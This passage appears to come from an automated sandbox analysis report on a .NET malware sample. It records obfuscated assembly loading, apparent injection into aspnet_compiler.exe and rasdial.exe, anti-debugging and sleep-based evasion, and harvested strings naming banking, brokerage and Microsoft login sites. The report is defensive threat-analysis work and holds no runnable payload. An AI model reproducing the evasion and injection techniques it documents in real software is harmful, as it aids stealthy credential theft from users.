            Source: Binary string: aspnet_compiler.pdb source: rasdial.exe, 00000006.00000002.3316528748.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3319482531.000000000511C000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2177618283.0000000013F4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdbBSJB source: x.exe

            Data Obfuscation

            Source: x.exe, c4b3fc756b99a7f509fc28017328f4772.cs .Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
            Source: x.exe, c223cf0b3e0150ecc4644dddecdf385fe.cs .Net Code: c4257aa7c135aa5bdeddfb4af573820e0 System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\x.exe Code function: 0_2_017E00F5 pushfd ; iretd 0_2_017E00FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00401820 push edx; ret 3_2_00401859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0041A08F push ecx; retf 3_2_0041A0F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0041A093 push ecx; retf 3_2_0041A0F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0041A154 push ecx; retf 3_2_0041A0F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004111F7 push edi; retf 3_2_0041120A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00418A64 push esp; retn 0045h 3_2_00418A75
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040D20A push ecx; iretd 3_2_0040D20E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00408292 pushfd ; ret 3_2_0040829A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00403300 push eax; ret 3_2_00403302
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00411309 push edi; retf 3_2_0041130C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0041E3A5 push eax; iretd 3_2_0041E3CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004114E3 push esi; iretd 3_2_004114EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00404D01 push eax; iretd 3_2_00404D11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00412DC3 push esi; ret 3_2_00412DCE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004015D1 push edx; ret 3_2_004015D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004015E4 push edx; ret 3_2_004015E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00401631 push edx; ret 3_2_00401634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8225F pushad ; ret 3_2_01A827F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A827FA pushad ; ret 3_2_01A827F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB09AD push ecx; mov dword ptr [esp], ecx 3_2_01AB09B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8283D push eax; iretd 3_2_01A82858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A81368 push eax; iretd 3_2_01A81369
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_0599678E push ecx; iretd 5_2_05996792
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_059A1FE8 push esp; retn 0045h 5_2_059A1FF9
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_0599A77B push edi; retf 5_2_0599A78E
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_059A36D8 push ecx; retf 5_2_059A3675
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_059A3613 push ecx; retf 5_2_059A3675
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_0599F1DC push FFFFFF87h; retf 5_2_0599F1E9
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_0599F1D7 push edx; ret 5_2_0599F1DA
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Code function: 5_2_059A7929 push eax; iretd 5_2_059A794F
            Source: C:\Users\user\Desktop\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\x.exe Memory allocated: 17A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\x.exe Memory allocated: 30D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\x.exe Memory allocated: 50D0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AF096E rdtsc 3_2_01AF096E
            Source: C:\Users\user\Desktop\x.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\x.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 428
            Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 9544
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\x.exe TID: 4536 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\x.exe TID: 3760 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\x.exe TID: 4536 Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308 Thread sleep count: 428 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308 Thread sleep time: -856000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308 Thread sleep count: 9544 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308 Thread sleep time: -19088000s >= -30000s
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe TID: 4568 Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe TID: 4568 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02C5BFE0 FindFirstFileW,FindNextFileW,FindClose,6_2_02C5BFE0
            Source: 48663I1M.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: discord.comVMware20,11696494690f
            Source: 48663I1M.6.dr Binary or memory string: AMC password management pageVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 48663I1M.6.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 48663I1M.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 48663I1M.6.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 48663I1M.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 48663I1M.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 48663I1M.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: x.exe, 00000000.00000002.3316517414.000000000152F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 48663I1M.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 48663I1M.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 48663I1M.6.dr Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: 48663I1M.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: crUcuBAsmdG.exe, 00000009.00000002.3318007528.00000000010BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: firefox.exe, 0000000A.00000002.2179079770.0000028713EFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\AgP
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: 48663I1M.6.dr Binary or memory string: global block list test formVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 48663I1M.6.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 48663I1M.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 48663I1M.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 48663I1M.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 48663I1M.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 48663I1M.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\x.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\rasdial.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AF096E rdtsc 3_2_01AF096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00417233 LdrLoadDll,3_2_00417233
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AF0185 mov eax, dword ptr fs:[00000030h] 3_2_01AF0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h] 3_2_01B3019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h] 3_2_01B54180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h] 3_2_01AAA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h] 3_2_01B6C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AE01F8 mov eax, dword ptr fs:[00000030h] 3_2_01AE01F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01B861E5 mov eax, dword ptr fs:[00000030h] 3_2_01B861E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]3_2_01B761C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]3_2_01B761C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE0124 mov eax, dword ptr fs:[00000030h]3_2_01AE0124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B70115 mov eax, dword ptr fs:[00000030h]3_2_01B70115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov ecx, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]3_2_01B84164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]3_2_01B84164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B48158 mov eax, dword ptr fs:[00000030h]3_2_01B48158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov ecx, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC156 mov eax, dword ptr fs:[00000030h]3_2_01AAC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]3_2_01AB6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]3_2_01AB6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA80A0 mov eax, dword ptr fs:[00000030h]3_2_01AA80A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B760B8 mov eax, dword ptr fs:[00000030h]3_2_01B760B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B760B8 mov ecx, dword ptr fs:[00000030h]3_2_01B760B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B480A8 mov eax, dword ptr fs:[00000030h]3_2_01B480A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB208A mov eax, dword ptr fs:[00000030h]3_2_01AB208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB80E9 mov eax, dword ptr fs:[00000030h]3_2_01AB80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA0E3 mov ecx, dword ptr fs:[00000030h]3_2_01AAA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B360E0 mov eax, dword ptr fs:[00000030h]3_2_01B360E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC0F0 mov eax, dword ptr fs:[00000030h]3_2_01AAC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF20F0 mov ecx, dword ptr fs:[00000030h]3_2_01AF20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B320DE mov eax, dword ptr fs:[00000030h]3_2_01B320DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46030 mov eax, dword ptr fs:[00000030h]3_2_01B46030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA020 mov eax, dword ptr fs:[00000030h]3_2_01AAA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC020 mov eax, dword ptr fs:[00000030h]3_2_01AAC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B34000 mov ecx, dword ptr fs:[00000030h]3_2_01B34000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADC073 mov eax, dword ptr fs:[00000030h]3_2_01ADC073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36050 mov eax, dword ptr fs:[00000030h]3_2_01B36050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB2050 mov eax, dword ptr fs:[00000030h]3_2_01AB2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]3_2_01AD438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]3_2_01AD438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE63FF mov eax, dword ptr fs:[00000030h]3_2_01AE63FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]3_2_01B543D4
